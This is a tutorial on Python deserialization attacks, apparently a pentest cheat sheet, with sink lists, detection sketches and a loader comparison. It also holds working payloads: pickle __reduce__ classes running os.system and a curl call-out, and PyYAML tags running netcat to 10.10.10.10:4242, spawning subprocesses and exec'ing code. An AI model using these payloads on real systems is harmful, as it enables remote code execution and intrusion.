Python Deserialization

Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.


Tools of the Trade

j0lt-github/python-deserialization-attack-payload-generator - Generates serialized payloads for deserialization RCE attacks on Python-driven applications where the pickle, PyYAML, ruamel.yaml, or jsonpickle module is used to deserialize data.


Methodology

In Python source code, look for these sinks:

  • cPickle.loads
  • pickle.loads
  • _pickle.loads
  • jsonpickle.decode
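
As a rough way to hunt for the sinks listed above, the following sketch walks a file's syntax tree with the standard `ast` module. The `SINKS` set and the `find_sinks` helper are hypothetical names introduced for illustration, and the matcher only recognizes the plain `module.func(...)` call form, so aliased imports such as `from pickle import loads` would be missed. The source must also parse under Python 3, so Python 2 files using `print` statements would need a different parser.

```python
import ast

# Sink names taken from the list above; extend as needed (assumption: the
# code under review calls them in the plain `module.func(...)` form).
SINKS = {
    ("cPickle", "loads"),
    ("pickle", "loads"),
    ("_pickle", "loads"),
    ("jsonpickle", "decode"),
}

def find_sinks(source):
    """Return sorted (line, "module.func") pairs for every call to a known sink."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Match attribute calls on a bare name, e.g. pickle.loads(...)
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            if (func.value.id, func.attr) in SINKS:
                hits.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(hits)

# Illustrative input; the code is only parsed, never executed.
sample = (
    "import pickle, jsonpickle\n"
    "a = pickle.loads(blob)\n"
    "b = jsonpickle.decode(text)\n"
    "c = json.loads(text)\n"
)
for line, name in find_sinks(sample):
    print(f"line {line}: {name}")
```

A hit only marks a place to review; whether it is exploitable depends on whether attacker-controlled data can reach the call.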

Pickle

Consider a Python web server built with Flask. A developer might be tempted to unpickle data received in a request for convenience.

import io
import pickle
from flask import Flask, request

app = Flask(__name__)

@app.route("/deserialize", methods=["POST"])
def deserialize():
    # Attacker controls request body
    raw_data = request.data
    # Unpickling untrusted bytes: this is the vulnerable call
    obj = pickle.load(io.BytesIO(raw_data))
    return str(obj)

In this example, pickle.load is applied directly to data derived from user input. If an attacker sends a malicious pickle stream, the code it encodes is executed during deserialization, when the handler processes the request. This is precisely the kind of pattern Semgrep’s rules can detect. The rules track data flow from untrusted sources such as HTTP request paths or headers and flag the places in the code where it reaches sensitive functions like pickle.load or pickle.loads. Semgrep currently covers over a dozen Python libraries with known insecure deserialization functions.
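
To see why unpickling amounts to code execution, here is a minimal and deliberately harmless sketch. The `Demo` class is a hypothetical stand-in for an attacker's payload: its `__reduce__` method tells pickle to call `sorted` on a list at load time, where a real payload would name something like `os.system`. The load uses the same `pickle.load(io.BytesIO(...))` call as the handler above.

```python
import io
import pickle

class Demo:
    # __reduce__ makes pickle store "call this callable with these arguments"
    # instead of the object's state. sorted() is a harmless placeholder.
    def __reduce__(self):
        return (sorted, ([3, 1, 2],))

raw_data = pickle.dumps(Demo())          # bytes an attacker would send
obj = pickle.load(io.BytesIO(raw_data))  # same call as in the handler

# The result is whatever the callable returned, not a Demo instance.
print(type(obj).__name__, obj)
```

The receiving side never needs the `Demo` class to be defined: the stream only references the callable by module and name, and the call happens inside `pickle.load` before the handler sees any object.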

Let's now look at the attacker's workflow.

The following code is a simple example of using cPickle in order to generate an auth_token which is a serialized User object.

danger

import cPickle will only work on Python 2

import cPickle
from base64 import b64encode, b64decode

class User:
    def __init__(self):
        self.username = "anonymous"
        self.password = "anonymous"
        self.rank = "guest"

h = User()
# Serialize the User object and base64-encode it to form the token
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}".format(auth_token))

The vulnerability is introduced when a token is loaded from user input.

new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)

The Python 2.7 documentation clearly states that pickle should never be used with untrusted sources. Let's create malicious data that will execute arbitrary code on the server.

info

The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

import cPickle, os
from base64 import b64encode, b64decode

class Evil(object):
    # __reduce__ tells pickle which callable to invoke at load time
    def __reduce__(self):
        return (os.system, ("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}".format(evil_token))

info

For Python 3, use pickle and not cPickle.

import pickle
import os
from base64 import b64encode, b64decode

class Hack(object):
    # __reduce__ tells pickle which callable to invoke at load time
    def __reduce__(self):
        return (os.system, ("curl https://ip:6699/",))

h = Hack()
token = b64encode(pickle.dumps(h))
# To target Python 2, use protocol 2 instead of the line above:
# token = b64encode(pickle.dumps(h, 2))
print(f"Your Evil Token is: {token.decode()}")
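
A token like the ones above can be examined without running it. The sketch below, offered as one possible triage approach rather than a complete detector, uses the standard `pickletools.genops` function, which only parses the opcode stream and never imports or calls anything. The `Probe` class and the `suspicious` opcode set are assumptions made for illustration, and `print` stands in for a dangerous callable.

```python
import pickle
import pickletools

class Probe:
    # Harmless stand-in for a payload class; print replaces os.system here.
    def __reduce__(self):
        return (print, ("side effect at load time",))

# dumps() only records the callable and its arguments; nothing is called yet.
payload = pickle.dumps(Probe())

# Collect opcode names by parsing the stream without executing it.
opcodes = [op.name for op, arg, pos in pickletools.genops(payload)]

# Opcodes that import a name or invoke a callable during loading
# (hypothetical shortlist chosen for this example).
suspicious = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}
found = [name for name in opcodes if name in suspicious]
print(found)
```

Legitimate pickles of class instances also contain these opcodes, so their presence is a hint about what to read more closely, not a verdict. `pickletools.dis(payload)` prints the full annotated listing, including the module and function names being imported.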

PyYAML

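YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures. With PyYAML, an unsafe loader honors Python-specific tags such as !!python/object/apply, which invoke a callable while the document is being loaded. Each payload below is independent of the others.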

!!python/object/apply:time.sleep [10]
!!python/object/apply:builtins.range [1, 10, 1]
!!python/object/apply:os.system ["nc 10.10.10.10 4242"]
!!python/object/apply:os.popen ["nc 10.10.10.10 4242"]
!!python/object/new:subprocess [["ls","-ail"]]
!!python/object/new:subprocess.check_output [["ls","-ail"]]
!!python/object/apply:subprocess.Popen
- ls
!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
  state:
    update: !!python/name:exec

Since PyYAML version 6.0, yaml.load no longer has a default loader: the Loader argument must be passed explicitly, which mitigates the risk of Remote Code Execution through an implicitly unsafe loader. PR #420 - Fix

The vulnerable sinks are now yaml.unsafe_load and yaml.load(input, Loader=yaml.UnsafeLoader).

import yaml

with open('exploit_unsafeloader.yml') as file:
    # UnsafeLoader constructs arbitrary Python objects from the file
    data = yaml.load(file, Loader=yaml.UnsafeLoader)
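
The difference between the loaders can be checked with one of the benign payloads from the list above. This sketch assumes PyYAML 5.1 or later is installed (for `yaml.unsafe_load`) and runs under Python 3; the `doc`, `rejected`, and `value` names are only for illustration.

```python
import yaml  # PyYAML (third-party)

# Benign payload from the list above: asks the loader to call range(1, 10, 1).
doc = "!!python/object/apply:builtins.range [1, 10, 1]"

# safe_load only understands standard YAML tags and refuses python/* tags.
try:
    yaml.safe_load(doc)
    rejected = False
except yaml.YAMLError as exc:
    rejected = True
    print("safe_load rejected:", type(exc).__name__)

# unsafe_load honors the tag and performs the call while loading.
value = yaml.unsafe_load(doc)
print("unsafe_load returned:", value)
```

Swapping `builtins.range` for `os.system` is all that separates this check from the command-execution payloads, which is why only the unsafe loaders count as sinks.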